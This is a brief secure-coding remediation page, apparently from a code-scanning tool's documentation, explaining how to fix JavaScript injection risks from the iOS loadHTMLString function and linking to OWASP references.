Insecure Use of Dangerous Function
Why is this important?
iOS like any other programming language, has dangerous functions. If these functions are not used properly, it can have a catastrophic impact on your app.
JavaScript Injection
Option A: Use operating system APIs securely
- Go through the issues that GuardRails identified in the PR.
- Locate the dangerous function,
loadHTMLString
- Ensure that users are not able to influence the filename or the path used to load the file, nor edit the loaded file.
- Test it and ensure the functionality works as expected
- Ship it 🚢 and relax 🌴
More information:
- Testing WebView Protocol Handlers
- OWASP Top 10 - A03 Injection
- Holistic Info-Sec for Web Developers: Injection risks, countermeasures